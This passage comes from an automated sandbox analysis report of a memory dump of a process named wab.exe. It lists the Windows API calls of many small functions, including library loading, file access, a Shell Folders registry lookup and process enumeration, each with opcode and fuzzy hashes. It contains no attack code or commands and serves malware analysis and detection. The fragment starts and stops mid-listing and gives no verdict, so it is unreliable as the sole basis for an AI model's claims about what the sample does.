                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                    • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                    • String ID:
                                    • API String ID: 3150196962-0
                                    • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                    • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                    • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                    • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                    APIs
                                    Strings
                                    • failed to allocate %u bytes of memory, xrefs: 004152F0
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: malloc
                                    • String ID: failed to allocate %u bytes of memory
                                    • API String ID: 2803490479-1168259600
                                    • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                    • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                    • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                    • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??3@
                                    • String ID:
                                    • API String ID: 613200358-0
                                    • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                    • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                    • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                    • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcmpmemset
                                    • String ID:
                                    • API String ID: 1065087418-0
                                    • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                    • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                    • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                    • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcpymemset
                                    • String ID:
                                    • API String ID: 1297977491-0
                                    • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                    • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                    • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                    • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                    APIs
                                      • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                      • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                      • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                      • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                    • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                    • String ID:
                                    • API String ID: 1481295809-0
                                    • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                    • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                    • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                    • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                    APIs
                                      • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                    • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                    • String ID:
                                    • API String ID: 3150196962-0
                                    • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                    • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                    • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                    • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                    APIs
                                    • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: File$PointerRead
                                    • String ID:
                                    • API String ID: 3154509469-0
                                    • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                    • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                    • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                    • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                    APIs
                                    • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                      • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                      • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                      • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: PrivateProfile$StringWrite_itowmemset
                                    • String ID:
                                    • API String ID: 4232544981-0
                                    • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                    • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                    • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                    • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                    APIs
                                    • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID:
                                    • API String ID: 3664257935-0
                                    • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                    • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                    • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                    • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                    APIs
                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                    • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: AddressProc$FileModuleName
                                    • String ID:
                                    • API String ID: 3859505661-0
                                    • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                    • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                    • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                    • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                    APIs
                                    • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: FileRead
                                    • String ID:
                                    • API String ID: 2738559852-0
                                    • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                    • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                    • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                    • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                    APIs
                                    • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: FileWrite
                                    • String ID:
                                    • API String ID: 3934441357-0
                                    • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                    • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                    • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                    • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                    APIs
                                    • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID:
                                    • API String ID: 3664257935-0
                                    • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                    • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                    • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                    • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??3@
                                    • String ID:
                                    • API String ID: 613200358-0
                                    • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                    • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                    • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                    • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                    APIs
                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                    • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                    • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                    • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                    APIs
                                    • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                    • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                    • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                    • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??3@
                                    • String ID:
                                    • API String ID: 613200358-0
                                    • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                    • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                    • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                    • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??3@
                                    • String ID:
                                    • API String ID: 613200358-0
                                    • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                    • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                    • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                    • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                    APIs
                                    • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID:
                                    • API String ID: 3664257935-0
                                    • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                    • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                    • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                    • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                    APIs
                                    • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: EnumNamesResource
                                    • String ID:
                                    • API String ID: 3334572018-0
                                    • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                    • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                    • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                    • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                    APIs
                                    • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID:
                                    • API String ID: 3664257935-0
                                    • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                    • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                    • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                    • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                    APIs
                                    • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: CloseFind
                                    • String ID:
                                    • API String ID: 1863332320-0
                                    • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                    • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                    • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                    • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                    APIs
                                    • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Open
                                    • String ID:
                                    • API String ID: 71445658-0
                                    • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                    • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                    • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                    • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                    • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                    • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                    • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??3@
                                    • String ID:
                                    • API String ID: 613200358-0
                                    • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                    • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                    • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                    • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                    • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                    • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                    • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                    APIs
                                    • memset.MSVCRT ref: 004095FC
                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                      • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                      • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                      • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                    • String ID:
                                    • API String ID: 3655998216-0
                                    • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                    • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                    • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                    • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                    • Instruction ID: 56811e6a31311fae19106e74f332fd481794b0d175407c03959d21f12539f693
                                    • Opcode Fuzzy Hash: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                    • Instruction Fuzzy Hash: 4201E572109E01E6DB1029278C81AF766899FC0399F14016FF94886281EEA8EEC542AE
                                    APIs
                                    • memset.MSVCRT ref: 00445426
                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
